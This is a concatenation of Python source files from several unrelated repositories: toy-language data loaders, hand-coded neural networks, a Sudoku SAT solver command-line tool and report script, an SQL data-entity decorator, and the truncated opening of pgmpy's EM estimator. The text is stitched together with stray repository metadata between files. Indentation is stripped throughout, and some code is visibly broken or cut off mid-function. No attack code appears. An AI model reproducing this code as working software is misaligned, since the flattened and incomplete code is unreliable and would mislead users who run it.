mx, unk = voc, w2i['.unk']
for key, seqs in sequences.items():
nw_sequences[key] = []
for seq in seqs:
seq = [s if s < mx else unk for s in seq]
nw_sequences[key].append(seq)
sequences = nw_sequences
if final:
return (sequences['train'], labels['train']), (sequences['test'], labels['test']), (i2w, w2i), 2
# Make a validation split
random.seed(seed)
x_train, y_train = [], []
x_val, y_val = [], []
val_ind = set( random.sample(range(len(sequences['train'])), k=val) )
for i, (s, l) in enumerate(zip(sequences['train'], labels['train'])):
if i in val_ind:
x_val.append(s)
y_val.append(l)
else:
x_train.append(s)
y_train.append(l)
return (x_train, y_train), \
(x_val, y_val), \
(i2w, w2i), 2
def gen_sentence(sent, g):
symb = '_[a-z]*'
while True:
match = re.search(symb, sent)
if match is None:
return sent
s = match.span()
sent = sent[:s[0]] + random.choice(g[sent[s[0]:s[1]]]) + sent[s[1]:]
def gen_dyck(p):
open = 1
sent = '('
while open > 0:
if random.random() < p:
sent += '('
open += 1
else:
sent += ')'
open -= 1
return sent
def gen_ndfa(p):
word = random.choice(['abc!', 'uvw!', 'klm!'])
s = ''
while True:
if random.random() < p:
return 's' + s + 's'
else:
s+= word
def load_brackets(n=50_000, seed=0):
return load_toy(n, char=True, seed=seed, name='dyck')
def load_ndfa(n=50_000, seed=0):
return load_toy(n, char=True, seed=seed, name='ndfa')
def load_toy(n=50_000, char=True, seed=0, name='lang'):
    random.seed(seed)  # honour the seed argument (the original hard-coded 0)
if name == 'lang':
sent = '_s'
toy = {
'_s': ['_s _adv', '_np _vp', '_np _vp _prep _np', '_np _vp ( _prep _np )', '_np _vp _con _s' , '_np _vp ( _con _s )'],
'_adv': ['briefly', 'quickly', 'impatiently'],
'_np': ['a _noun', 'the _noun', 'a _adj _noun', 'the _adj _noun'],
'_prep': ['on', 'with', 'to'],
'_con' : ['while', 'but'],
'_noun': ['mouse', 'bunny', 'cat', 'dog', 'man', 'woman', 'person'],
'_vp': ['walked', 'walks', 'ran', 'runs', 'goes', 'went'],
'_adj': ['short', 'quick', 'busy', 'nice', 'gorgeous']
}
sentences = [ gen_sentence(sent, toy) for _ in range(n)]
sentences.sort(key=lambda s : len(s))
elif name == 'dyck':
sentences = [gen_dyck(7./16.) for _ in range(n)]
sentences.sort(key=lambda s: len(s))
elif name == 'ndfa':
sentences = [gen_ndfa(1./4.) for _ in range(n)]
sentences.sort(key=lambda s: len(s))
else:
raise Exception(name)
tokens = set()
for s in sentences:
if char:
for c in s:
tokens.add(c)
else:
for w in s.split():
tokens.add(w)
i2t = [PAD, START, END, UNK] + list(tokens)
t2i = {t:i for i, t in enumerate(i2t)}
sequences = []
for s in sentences:
if char:
tok = list(s)
else:
tok = s.split()
sequences.append([t2i[t] for t in tok])
return sequences, (i2t, t2i)
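# --- Hedged usage sketch (editor addition) ---
# Minimal calls showing what the loaders above return; the printed shapes
# follow the defaults, everything else is illustrative.
#
# (xtrain, ytrain), (xval, yval), num_classes = load_synth()
# print(xtrain.shape, num_classes)          # (60000, 2) 2
# seqs, (i2t, t2i) = load_ndfa(n=1000)
# print(''.join(i2t[i] for i in seqs[0]))   # short strings like 'ss'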
```
#### File: deep-net/network/GenericNetwork.py
```python
from network.Activations import Activations
import numpy
import warnings
class GenericNetwork:
def __init__(self):
# weights and biases
self.W = numpy.random.normal(scale=1.0,size=(2,3)).tolist()
self.V = numpy.random.normal(scale = 1.0, size = (3, 2)).tolist()
self.B = [0., 0., 0.]
self.C = [0., 0.]
# hidden layers
self.K = [0., 0., 0.]
self.H = [0., 0., 0.]
self.Y = [0., 0.]
    def forward(self, X, T) -> tuple:  # returns (P, L): class probabilities and the loss
self.K = [0., 0., 0.]
self.H = [0., 0., 0.]
self.Y = [0., 0.]
P = [0., 0.]
for j in range(len(self.K)):
for i in range(len(X)):
self.K[j] += self.W[i][j] * X[i]
self.K[j] += self.B[j]
self.H[j] = Activations.sigmoid(self.K[j])
for j in range(len(self.Y)):
for i in range(len(self.H)):
self.Y[j] += self.V[i][j] * self.H[i]
self.Y[j] += self.C[j]
for i in range(len(self.Y)):
P[i] = Activations.softmax(self.Y, i)
L = -(T[0] * numpy.log(P[0]) + T[1] * numpy.log(P[1]))
return P, L
    def backward(self, X: list, P: list, T: list) -> tuple:  # returns (dLdW, dLdB, dLdV, dLdC)
dLdP = [0.,0.]
dLdY = [0.,0.]
dLdV = [[0.,0.],[0.,0.],[0.,0.]]
dLdC = [0.,0.]
dLdH = [0.,0.,0.]
dLdK = [0.,0.,0.]
        dLdW = [[0., 0., 0.], [0., 0., 0.]]  # same 2x3 shape as W
dLdB = [0., 0., 0.]
for i in range(len(dLdP)):
dLdP[i] = -T[i] / P[i]
dLdY[0]= (dLdP[0] - dLdP[1]) * P[0] * P[1]
dLdY[1]= (dLdP[1] - dLdP[0]) * P[0] * P[1]
for j in range(len(self.Y)):
for i in range(len(self.H)):
dLdV[i][j] = (P[j] - T[j]) * self.H[i]
dLdC[j] = dLdY[j]
for i in range(len(self.H)):
dLdH[i] = dLdY[0] * self.V[i][0] + dLdY[1] * self.V[i][1]
for i in range(len(self.K)):
dLdK[i] = dLdH[i] * self.H[i] * (1 - self.H[i])
        for j in range(len(self.K)):
            for i in range(len(X)):
                dLdW[i][j] = dLdK[j] * X[i]
            dLdB[j] = dLdK[j]  # bias gradient for unit j (the original indexed with the stale inner-loop variable)
return dLdW, dLdB, dLdV, dLdC
def step(self, dLdW, dLdB, dLdV, dLdC, alpha) -> None:
for i in range(len(self.W)):
for j in range(len(self.W[i])):
self.W[i][j] += -alpha * dLdW[i][j]
for i in range(len(self.B)):
self.B[i] -= alpha * dLdB[i]
for i in range(len(self.V)):
for j in range(len(self.V[i])):
self.V[i][j] -= alpha * dLdV[i][j]
for i in range(len(self.C)):
self.C[i] -= alpha * dLdC[i]
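# --- Hedged usage sketch (editor addition) ---
# One plausible training loop over the synthetic data from data.py; the
# import path, learning rate and one-hot encoding are illustrative
# assumptions, not taken from the repo.
#
# from data import load_synth
# (xtrain, ytrain), _, _ = load_synth()
# net = GenericNetwork()
# for x, t in zip(xtrain.tolist(), ytrain.tolist()):
#     target = [1., 0.] if t == 0 else [0., 1.]   # one-hot encode the label
#     P, L = net.forward(x, target)
#     grads = net.backward(x, P, target)
#     net.step(*grads, alpha=0.01)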
```
#### File: deep-net/network/MNISTNetwork.py
```python
import numpy as np
class MNISTNetwork:
def __init__(self):
# set initial values
self.W = np.random.normal(size = (784,300))
self.V = np.random.normal(size = (300,10))
self.B = np.zeros(300)
self.C = np.zeros(10)
self.K = None
self.H = None
self.Y = None
    # NOTE (editor): forward() below calls self.sigmoid/self.softmax, which the
    # original file never defines; these are the standard definitions, added as
    # an assumption so the class is runnable.
    @staticmethod
    def sigmoid(x):
        return 1.0 / (1.0 + np.exp(-x))

    @staticmethod
    def softmax(x):
        e = np.exp(x - np.max(x))  # subtract the max for numerical stability
        return e / e.sum()
def forward(self, X, T):
self.K = np.matmul(X, self.W) + self.B
self.H = self.sigmoid(self.K)
self.Y = np.matmul(self.H, self.V) + self.C
S = self.softmax(self.Y)
L = -np.log(S[T])
return S, L
def backward(self, X, T, S):
dLdS = np.zeros(len(S))
dLdS[T] = -1 / S[T]
dLdY = -S * np.sum(dLdS * S) + dLdS * S
dLdV = np.outer(self.H, dLdY)
dLdC = dLdY
V = self.V
dLdH = np.dot(dLdY, V.T)
dLdK = dLdH * self.H * (1 - self.H)
dLdW = np.outer(X, dLdK)
dLdB = dLdK
return dLdV, dLdC, dLdW, dLdB
def step(self, dLdV, dLdC, dLdW, dLdB, alpha):
self.W -= alpha * dLdW
self.B -= alpha * dLdB
self.V -= alpha * dLdV
self.C -= alpha * dLdC
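# --- Hedged usage sketch (editor addition) ---
# SGD over MNIST using the loaders in data.py; the import path, learning
# rate and 1/255 normalization are illustrative assumptions.
#
# from data import load_mnist
# (xtrain, ytrain), _, _ = load_mnist()
# net = MNISTNetwork()
# for x, t in zip(xtrain / 255.0, ytrain):
#     S, L = net.forward(x, t)
#     grads = net.backward(x, t, S)
#     net.step(*grads, alpha=0.01)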
``` |
{
"source": "1bayezian/pydoku",
"score": 3
} |
#### File: pydoku/pydoku/cli.py
```python
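"""pydoku command line interface.

NOTE (editor): docopt() below parses this module docstring. The original
usage string was not preserved in this dump, so the pattern here is a
plausible reconstruction from the ARG_KEY_* constants, not the author's.

Usage:
    pydoku -S (-1 | -2 | -3) FILE
    pydoku --help
"""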
from pydoku.SATSolver import SATSolver
from pydoku.FileHandler import FileHandler
from pydoku.HeuristicType import HeuristicType
from docopt import docopt
from termcolor import colored, cprint
import sys
ARG_KEY_HELP = '--help'
ARG_KEY_SOLVE = '-S'
ARG_KEY_DPLL = '-1'
ARG_KEY_RAND = '-2'
ARG_KEY_MOMS = '-3'
ARG_KEY_FILEPATH = 'FILE'
def error(message: str) -> None:
"""
Prints out an error message in the terminal
Parameters
----------
message : str
message to display the user
Returns
-------
None
See Also
--------
interpret : function interpreting the command line input and providing heuristic directive to the SAT solver
"""
cprint(message, 'red', attrs = ['bold'], file = sys.stderr)
def success(message: str) -> None:
"""
Prints out a success message in the terminal
Parameters
----------
message : str
message to display the user
Returns
-------
None
See Also
--------
interpret : function interpreting the command line input and providing heuristic directive to the SAT solver
"""
cprint(message, 'green', attrs = ['bold'], file = sys.stderr)
def interpret():
"""
Interprets command line input and provides appropriate input to the SAT solver.
If our SAT solver is able to find a suitable solution to the input CNF, the solution is written to the output file in DIMACS format.
Returns
-------
None
See Also
--------
success : function printing success messages to terminal
error : function printing error messages to terminal
"""
args = docopt(__doc__)
    if not args[ARG_KEY_SOLVE]:  # docopt stores unset flags as False, not None
        error('Invalid input for command line utility.')
        sys.exit(1)  # exit non-zero so callers can detect failure
if args[ARG_KEY_DPLL]:
heuristic = HeuristicType.STANDARD_DPLL
elif args[ARG_KEY_RAND]:
heuristic = HeuristicType.RANDOM_LITERAL
elif args[ARG_KEY_MOMS]:
heuristic = HeuristicType.MAX_OCCURRENCES_MIN_SIZE
else:
error('Invalid heuristic provided as input.')
        sys.exit(1)
filepath = args[ARG_KEY_FILEPATH]
output_filepath = f'{filepath}.out'
try:
cnf = FileHandler.parse(filepath)
    except Exception:
        error('Error: An error occurred while reading the file provided.')
        sys.exit(1)
try:
solver = SATSolver()
satisfied, assignments, backtracks = solver.solve(cnf, heuristic)
if satisfied:
FileHandler.output(output_filepath, assignments)
success('Satisfiable solution for the formula found.')
success(f'Number of backtracks: {backtracks}')
success(f'Truth assignments satisfying the CNF can be found here: {output_filepath}')
else:
error('Formula provided is unsatisfiable.')
error(f'Number of backtracks: {backtracks}')
    except Exception:
        error('Error: An error occurred while solving the provided CNF formula.')
        sys.exit(1)
if __name__ == "__main__":
interpret()
```
#### File: pydoku/test_scripts/create_report.py
```python
from pydoku.SATSolver import SATSolver
from pydoku.FileHandler import FileHandler
from pydoku.HeuristicType import HeuristicType
import time
from copy import deepcopy
import math
import csv
def to_dimacs(sudoku: str) -> str:
"""
Takes in a string defining a sudoku as parameter and encodes it into dimacs
Parameters
----------
sudoku: string
a definition of the puzzle in dimacs format
Returns
-------
string
returns string describing the sudoku puzzle in dimacs format
"""
sudoku_values = []
sudoku = sudoku.strip()
side = int(math.sqrt(len(sudoku)))
for i, value in enumerate(sudoku):
if value != '.':
row = (i // side) + 1
column = (i % side) + 1
rcv = f'{row}{column}{value} 0'
sudoku_values.append(rcv)
return '\n'.join(sudoku_values)
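# --- Hedged usage sketch (editor addition) ---
# For a 4x4 puzzle string, each given cell becomes a "<row><col><value> 0"
# unit clause; the puzzle below is illustrative.
#
# print(to_dimacs('1...' '..2.' '.3..' '...4'))
# # 111 0
# # 232 0
# # 323 0
# # 444 0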
def evaluate(cnf: list, assignments: dict) -> bool:
"""
    Checks whether a truth assignment satisfies a CNF formula
    Parameters
    ----------
    cnf : list
        a list of clauses defining a CNF
    assignments : dict
        a mapping from atoms to their assigned truth values
Returns
-------
bool
returns true if the assignments provided satisfy the CNF
"""
    for clause in cnf:
        valid = False  # a clause holds once any one of its literals is satisfied
        for literal in clause:
            if literal[0] == '-':
                # negated literal: satisfied when the atom is assigned False
                valid = valid or not assignments[literal[1:]]
            else:
                valid = valid or assignments[literal]
        if not valid:
            return False
    return True
if __name__ == '__main__':
sizes = [4, 9]
heuristic_ids = [ 1, 2, 3 ]
for size in sizes:
sudoku_examples = f'pydoku/test_files/{size}x{size}/examples.txt'
sudoku_rules = f'pydoku/test_files/{size}x{size}/rules.txt'
sudoku_file = f'pydoku/test_files/{size}x{size}/dimacs.txt'
rules = FileHandler.parse(sudoku_rules)
examples = open(sudoku_examples, 'r')
with open(f'pydoku/test_files/reports/{size}x{size}.csv', 'w', newline = '') as file:
csv_writer = csv.writer(file)
csv_writer.writerow([ 'Heuristic', 'Size', 'Satisfied', 'Backtracks', 'Splits', 'Run Time' ])
for line in examples:
dimacs = to_dimacs(line)
# write the dimacs to a file, this will allow us to mimic reading the CNF from files
write_file = open(sudoku_file, '+w')
write_file.write(dimacs)
write_file.close()
sudoku = FileHandler.parse(sudoku_file)
cnf = sudoku + rules
for heuristic_id in heuristic_ids:
start_time = time.time()
heuristic = HeuristicType(heuristic_id)
solver = SATSolver()
satisfied, result_assignments, backtracks, splits = solver.solve(deepcopy(cnf), heuristic)
# check if the returned assignments are valid
valid = evaluate(cnf, result_assignments)
if valid:
print(f'DPLL Output: Satisfied. Backtracks: {backtracks}')
else:
print('DPLL Output: Unsatisfied')
runtime = time.time() - start_time
print('--- %s seconds ---' % runtime)
print('--- %s backtracks ---' % backtracks)
csv_writer.writerow([heuristic, f'{size}x{size}', satisfied, backtracks, splits, runtime])
file.close()
``` |
{
"source": "1ber/muriki",
"score": 2
} |
#### File: muriki/muriki/DataEntity.py
```python
import csv
import re
import sys
from decimal import *
from gettext import gettext as _
from muriki.DataProperty import *
import traceback
#~ ( DataProperty, generate_error_message, data_property
#~ , auto_data_property, Sql)
#import psycopg2 // will be needed if postgre database is used
#from .DataProperty import *
"""
This utility is intended to ease the import of data from files and
its persistence into databases. Options are designed to make those
resources easy to insert into existing code (using decorators)
while writing a minimum of code.
"""
def data_entity(
cls=None,
database_engine=None,
database_server_address=None,
database_user=None,
database_password=<PASSWORD>,
database_name=None,
database_port=None,
):
"""
    This class decorator allows a class to be easily used to import
    data from files and to persist this data
:param cls: The class to be decorated, passed automatically to the
decorator
:param database_engine: Database engine to be used to
persist data, see the DataProperty.Sql.DatabaseEngine
:param database_server_address: network address of the
server that will be used to persist data
:param database_user: user to persist data, if necessary
:param database_password: password to grant access to
the user on the database
:param database_port: TCP port of the database server to
be used in the connection
"""
@classmethod
def create_table(cls):
"""
        Simply uses the execute_sql function to create, in the database,
        the table that corresponds to the class
:param cls: The class passed by the decorator
"""
cls.execute_sql(cls.create_table_sql())
@classmethod
def execute_sql(cls, sql_statements=[], values=None, commit=True):
"""
Execute arbitrary sql code, the code is generated in other functions
based on the sqlEngine parameter
:param cls: The class passed by the decorator
"""
try:
## TODO, this is UGLY, need to separate in two functions, one to
## single and other to multiple statements
## also needs a better aproach for multiple value sets
## and native multiple execution
if( type( sql_statements ) == str ):
tmp = sql_statements
sql_statements=list()
sql_statements.append( tmp )
for sql_statement in sql_statements:
if ( values is not None ):
result = cls._cursor.execute(sql_statement, values)
else:
result = cls._cursor.execute(sql_statement )
cls._connection.commit()
except Exception as e:
#~ traceback.print_exc()
print ( str( e.args ) )
raise Exception(
'Sql Error:' + str(sql_statements)+',values:'+str(values)+':'
) from e
#~ raise Exception(
#~ 'Sql Error:' + (
#~ cls._cursor .mogrify(sql, values).decode('utf-8'))
#~ ) from e
#~ return result
@classmethod
def sql_columns(cls):
"""
        Searches the decorated properties, collects those with sql_column_type
        defined and puts them in the corresponding list. The separation is
        needed to create the columns in a certain order (keys, indexes,
        data) to improve performance
:param cls: The class passed by the decorator
"""
columns = {
Sql.ColumnType.AUTO_INCREMENT: [],
Sql.ColumnType.PRIMARY_KEY: [],
Sql.ColumnType.INDEX: [],
Sql.ColumnType.SIMPLE: [],
}
for k, cls_member in vars(cls).items():
if (not (cls_member is None)
and isinstance(cls_member, DataProperty)
and ( getattr( cls_member, 'sql_column_type', None)
is not None )
):
columns[cls_member.sql_column_type].append(
cls_member)
return columns
@classmethod
def fl_properties(cls):
"""
        Searches the decorated properties, collects those with the fl_start
        member defined, orders by this member and returns the list.
        The order is important in a fixed-length import
:param cls: The class passed by the decorator
"""
flp = [p for p in vars(cls).values()
if ((p is not None) and isinstance(p, DataProperty)
and not(p.fl_start is None))
]
flp.sort(key=lambda f: f.fl_start)
return flp
@classmethod
def csv_properties(cls):
"""
        Searches the decorated properties, collects those with the csv_position
        member defined, orders by this member and returns the list.
        The order is important in a CSV import
:param cls: The class passed by the decorator
"""
csvp = [p for p in vars(cls).values()
if ((p is not None) and isinstance(p, DataProperty)
and not( getattr( p, 'csv_position', None ) is None))
]
csvp.sort(key=lambda f: f.csv_position)
return csvp
@classmethod
def create_table_sql(cls):
"""
Generates the string (based on the properties passed to the
decorator) used to create the corresponding table
:param cls: The class passed by the decorator
"""
sql_statements=[]
tmp = cls._database_engine.create_table.value + \
' ' + (cls.__name__.lower() + ' ( ')
aditional_primary_key = ''
        ## The sql columns are inserted in a specific order
        ## to improve performance
for c in cls.sql_columns()[Sql.ColumnType.AUTO_INCREMENT]:
aditional_primary_key = aditional_primary_key + c._name + ', '
tmp = tmp + get_sql_definition(cls, c) + ', '
for c in cls.sql_columns()[Sql.ColumnType.PRIMARY_KEY]:
tmp = tmp + get_sql_definition(cls, c) + ', '
aditional_primary_key = aditional_primary_key + c._name + ', '
for c in cls.sql_columns()[Sql.ColumnType.INDEX]:
tmp = tmp + get_sql_definition(cls, c) + ', '
sql_statements.append(
cls._database_engine.index.value.format(
cls.__name__.lower(),c._name.lower())
)
for c in cls.sql_columns()[Sql.ColumnType.SIMPLE]:
tmp = tmp + get_sql_definition(cls, c) + ', '
        ## format the string, inserting additional key and index
        ## clauses
tmp = (tmp
+ ((cls._database_engine.primary_key.value
.format(aditional_primary_key))
if aditional_primary_key
else '')
+ ');')
        # clean up the unused extra commas
        tmp = re.sub(r',\s*\)', ' )', tmp)  # raw string avoids invalid-escape warnings
sql_statements.insert( 0, tmp )
return sql_statements
@classmethod
def insert_sql(cls):
"""
Generates the string (based on the properties passed to the
decorator) used to create one register on the database, this
register will 'fit' in a database created by create_table_sql
function
:param cls: The class passed by the decorator
"""
names = []
auto_increment_field_name = ''
for k, sql_columns_by_type in cls.sql_columns().items():
for sql_column in sql_columns_by_type:
if(
sql_column.sql_column_type
!=Sql.ColumnType.AUTO_INCREMENT
):
names.append(sql_column._name)
#~ else:
#~ auto_increment_field_name = sql_column._name
insert_sql = (
cls._database_engine.insert.value.format(
cls.__name__.lower()
,', '.join(names)
,(
(str( cls._database_engine.value_place_holder.value)+',')
* len(names)
)
)
)
        insert_sql = re.sub(r',\s*\)', ' )', insert_sql)
return insert_sql
@classmethod
def batch_insert(cls, instances=[]):
"""
Creates a 'huge' string to insert a lot of registers in just one
execution.
:param cls: The class passed by the decorator
        :param instances: a list of the objects to be persisted
"""
batch_sql = ''
for instance in instances:
batch_sql = batch_sql + instance.insert_sql_with_values()
cls.execute_sql(batch_sql)
#TODO - Define what to do when there is an error in a property (add parameter to choose?)
@classmethod
def create_from_csv(
cls,
file_name=None,
headers=False,
delimiter='\t',
quotechar=None):
"""
Creates a list of instances of objects from the defined entity
from an csv file
:param cls: The class passed by the decorator
:param file_name: The name of the file (csv formatted)
        :param headers: Whether the file has a first row with column names
:param delimiter: The delimiter of the fields in the csv file
:param quotechar: The char used to 'enclose' the values, it's
needed to allow the delimiter to occur inside the fields
"""
#~ with (open( file_name ) as csv_file:
#~ csv_reader = csv.DictReader( fieldnames= )
entities = []
csv_file = open(file_name)
csv_reader = csv.reader(
csv_file
, delimiter=delimiter
, quotechar=quotechar
)
if ( headers ):
next( csv_reader, None )
for row_number, row in enumerate( csv_reader ):
entity = cls()
entity.properties_from_csv( row )
entities.append( entity )
#~ raise Exception(
#~ 'Error creating entities from csv file, line:'
#~ + str( row_number )
#~ +':'+ str(row)+':'
#~ ) from e
return ( entities )
def properties_from_csv(self, values=None):
"""
        Sets the values of the properties of an object (self) from a list of values
        :param self: The object whose properties will be set
        :param values: The list of values to be set on the properties
"""
try:
for p in self.__class__.csv_properties():
setattr(self, p._name, values[ p.csv_position] )
except Exception as e:
raise Exception(
'Error reading property: '
+'class properties length:'
+ str( len( self.__class__.csv_properties() ) )
+ ', values length:' + str( len( values ) )
+ ', property: '+str( p )
+ ' from values: '
+ str( values )
) from e
@classmethod
def create_from_fl(cls, file_name=None, encoding="utf-8"
, fl_line_length=None , fl_regex=None ):
"""
Create a list of objects from the type (cls) reading the values from
a fixed length file
:param cls: The class passed by the decorator
        :param file_name: The name (and location) of the file to be
            read
        :param encoding: The encoding to be used to read the file
        :param fl_line_length: Chunk size to be read and converted
            to a line, for files with no line endings
:param fl_regex: Regex to be used to identify lines with
registers to be imported into instances of the
specified class
"""
data_lines = []
if ( fl_line_length is not None ):
with open(file_name, "rb") as f:
for chunk in iter(lambda: f.read( fl_line_length ), b""):
data_lines.append( chunk.decode( encoding ) )
else:
fl_file = open(file_name, 'r', encoding=encoding)
for row in fl_file:
data_lines.append( row )
entities=[]
for line_number, line in enumerate( data_lines ):
if ( fl_regex is None or re.match( fl_regex, line) ):
entity = cls()
entity.properties_from_fl( line )
entities.append(entity)
return entities
def properties_from_fl(self, string=None):
"""
Set the values of the properties from a fixed length string
:param self: The object which the values will be set
        :param string: The string the values will be read from
"""
for p in self.__class__.fl_properties():
tmp = string[p.fl_start: (p.fl_start + p.fl_length)].strip()
setattr(self, p._name, tmp)
def insert_sql_with_values(self):
"""
        Generates an sql string with the values, ready to be inserted into
        the database
"""
values = []
for k, sql_columns_by_type in self.__class__.sql_columns().items():
for sql_column in sql_columns_by_type:
                if(sql_column.sql_column_type != Sql.ColumnType.AUTO_INCREMENT):  # 'auto_increment' was an undefined name
values.append(self.get_property_value(sql_column))
## TODO - Only for Postgre, needs rewriting for other DBs
return (
self.__class__._cursor.mogrify(
self.__class__.insert_sql(),
values).decode('utf-8'))
def insert(self, commit=True):
"""
        Inserts the values of the object (self) into the database
:param commit: commit directly after executing the sql
"""
values = []
for k, sql_columns_by_type in self.__class__.sql_columns().items():
for sql_column in sql_columns_by_type:
if(
sql_column.sql_column_type
!=Sql.ColumnType.AUTO_INCREMENT
):
values.append(self.get_property_value(sql_column))
_id = self.__class__.execute_sql(
self.__class__.insert_sql(), values, commit)
return _id
def get_property_value(self, data_property=None):
"""
        Reads the value of a sql column; if the value can't be read and there
        is a default, the default is returned, None otherwise
        :param data_property: Property to be read
"""
value = getattr(self, data_property._name,
getattr(data_property, 'default_value', None)
)
if(
type( value ) == Decimal
and value == Decimal( 'NaN' )
):
return None ## ?? TODO Assume None = NaN = Null
else:
if ( self.__class__._database_engine==Sql.Sqlite ):
return str( value )
else:
return value
def get_sql_definition(cls=None, cls_member=None):
"""
        Returns the sql definition of a given member of the class
:param cls: The class passed by the decorator
:param cls_member: The member which the sql should be generated
"""
length=None
if(cls_member.sql_column_type
== Sql.ColumnType.AUTO_INCREMENT):
return (cls._database_engine.auto_increment.value
.format(cls_member._name))
else:
python_data_type = getattr(cls_member, 'data_type', str)
sql_data_type = (cls._database_engine[
python_data_type.__name__].value)
if(python_data_type == str):
length = (
getattr(cls_member, 'max_length',
getattr(cls_member, 'length',
getattr(cls_member, 'fl_length',
0 )
)
)
)
if(length >= BIG_TEXT_MIN_LEN):
sql_data_type = (cls._database_engine.bigtext.value)
elif( length > 0 ):
sql_data_type = (
cls._database_engine.str.value
+ '('+str( length ) + ')'
)
else:
sql_data_type = ( cls._database_engine.text.value )
#~ elif(length > 0):
#~ sql_data_type = (sql_data_type + '('
#~ + str(length) + ')')
elif(python_data_type == int):
max_value = getattr(cls_member, 'max_exclusive',
getattr(cls_member, 'max_inclusive', 0)
)
if(max_value > INT_MAX_VALUE):
sql_data_type = (cls._database_engine.biginteger.value)
try:
if(cls_member.fl_length > 9):
sql_data_type = (cls._database_engine.biginteger.value)
except BaseException:
pass
elif(python_data_type == Decimal):
total_digits = getattr(
cls_member, 'total_digits', DEFAULT_DECIMAL_TOTAL_DIGITS)
fraction_digits = getattr(
cls_member,
'fraction_digits',
DEFAULT_DECIMAL_FRACTION_DIGITS)
sql_data_type = (
sql_data_type + '(' + str(total_digits) + ', '
+ str(fraction_digits) + ')')
if( length is not None ):
return sql_data_type.format(cls_member._name , length )
else:
return sql_data_type.format(cls_member._name )
@classmethod
def fl_properties_names( cls ):
fl_p_names=list()
for fl_p in cls.fl_properties():
fl_p_names.append( fl_p._name )
return fl_p_names
def values( self ):
p_values=list()
for prop in self.__class__.fl_properties():
p_values.append( self.get_property_value( prop) )
return p_values
@classmethod
def write_csv_file(
cls,
file_name=None,
headers=True,
delimiter='\t',
quotechar='"',
instances=list() ):
"""
Write a series of instances of the decorated class into a
csv file
"""
with open( file_name, 'w', ) as csv_file:
csv_writer = csv.writer(
csv_file,
delimiter=delimiter,
quotechar=quotechar,
quoting=csv.QUOTE_MINIMAL
)
if( headers ):
header_names=list()
for csv_prop in cls.csv_properties():
header_names.append( csv_prop._name )
csv_writer.writerow( header_names )
for instance in instances:
csv_writer.writerow( instance.values() )
if (cls is None):
        ## This is the chunk that really decorates the class, inserting the
## various methods defined above
def wrapper(cls):
cls._database_engine = database_engine
cls.sql_columns = sql_columns
cls.create_table_sql = create_table_sql
cls.create_table = create_table
cls.execute_sql = execute_sql
cls.insert = insert
cls.get_property_value = get_property_value
cls.insert_sql = insert_sql
cls.batch_insert = batch_insert
cls.insert_sql_with_values = insert_sql_with_values
cls.create_from_csv = create_from_csv
cls.properties_from_fl = properties_from_fl
cls.create_from_fl = create_from_fl
cls.fl_properties = fl_properties
cls.properties_from_csv=properties_from_csv
cls.csv_properties = csv_properties
cls.fl_properties_names=fl_properties_names
cls.values = values
cls.write_csv_file=write_csv_file
if not(database_name is None):
if( cls._database_engine == Sql.Mysql ):
import mysql.connector
cls._connection = mysql.connector.connect(
database=database_name,
user=database_user,
password=<PASSWORD>,
host=database_server_address,
port=database_port)
cls._cursor = cls._connection.cursor()
elif( cls._database_engine == Sql.Postgresql ):
# TODO - Maybe not the best strategy
import psycopg2
cls._connection = psycopg2.connect(
dbname=database_name,
user=database_user,
password=<PASSWORD>,
host=database_server_address,
port=database_port)
cls._cursor = cls._connection.cursor()
elif( cls._database_engine == Sql.Sqlite ):
# TODO - Maybe not the best strategy
import sqlite3
cls._connection = sqlite3.connect(database=database_name )
cls._cursor = cls._connection.cursor()
return cls
return wrapper
return cls
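# --- Hedged usage sketch (editor addition) ---
# One plausible way to use the decorator with an SQLite backend. The property
# definitions and the Sql.Sqlite enum usage are assumptions based on the
# DataProperty module imported above, not verbatim from the repo.
#
# @data_entity(database_engine=Sql.Sqlite, database_name=':memory:')
# class Person:
#     name = data_property(data_type=str, csv_position=0, max_length=50)
#     age = data_property(data_type=int, csv_position=1)
#
# Person.create_table()
# people = Person.create_from_csv(file_name='people.csv', headers=True)
# Person.batch_insert(people)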
``` |
{
"source": "1betatsu/pgmpy",
"score": 3
} |
#### File: pgmpy/estimators/EM.py
```python
import warnings
from itertools import product, chain
import numpy as np
import pandas as pd
from tqdm.auto import tqdm
from pgmpy.estimators import ParameterEstimator, MaximumLikelihoodEstimator
from pgmpy.models import BayesianNetwork
from pgmpy.factors.discrete import TabularCPD
from pgmpy.global_vars import SHOW_PROGRESS
class ExpectationMaximization(ParameterEstimator):
def __init__(self, model, data, **kwargs):
"""
Class used to compute parameters for a model using Expectation
Maximization (EM).
EM is an iterative algorithm commonly used for
estimation in the case when there are latent variables in the model.
The algorithm iteratively improves the parameter estimates maximizing
the likelihood of the given data.
Parameters
----------
model: A pgmpy.models.BayesianNetwork instance
data: pandas DataFrame object
DataFrame object with column names identical to the variable names
of the network. (If some values in the data are missing the data
cells should be set to `numpy.NaN`. Note that pandas converts each
column containing `numpy.NaN`s to dtype `float`.)
state_names: dict (optional)
A dict indicating, for each variable, the discrete set of states
that the variable can take. If unspecified, the observed values in
the data set are taken to be the only possible states.
complete_samples_only: bool (optional, default `True`)
Specifies how to deal with missing data, if present. If set to
`True` all rows that contain `np.NaN` somewhere are ignored. If
`False` then, for each variable, every row where neither the
variable nor its parents are `np.NaN` is used.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianNetwork
>>> from pgmpy.estimators import ExpectationMaximization
>>> data = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> model = BayesianNetwork([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> estimator = ExpectationMaximization(model, data)
"""
if not isinstance(model, BayesianNetwork):
raise NotImplementedError(
"Expectation Maximization is only implemented for BayesianNetwork"
)
super(ExpectationMaximization, self).__init__(model, data, **kwargs)
self.model_copy = self.model.copy()
def _get_likelihood(self, datapoint):
"""
Computes the likelihood of a given datapoint. Goes through each
CPD matching the combination of states to get the value and multiplies
them together.
"""
likelihood = 1
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for cpd in self.model_copy.cpds:
scope = set(cpd.scope())
likelihood *= cpd.get_value(
**{key: value for key, value in datapoint.items() if key in scope}
)
return likelihood
def _compute_weights(self, latent_card):
"""
For each data point, creates extra data points for each possible combination
of states of latent variables and assigns weights to each of them.
"""
cache = []
data_unique = self.data.drop_duplicates()
n_counts = self.data.groupby(list(self.data.columns)).size().to_dict()
for i in range(data_unique.shape[0]):
v = list(product(*[range(card) for card in latent_card.values()]))
latent_combinations = np.array(v, dtype=int)
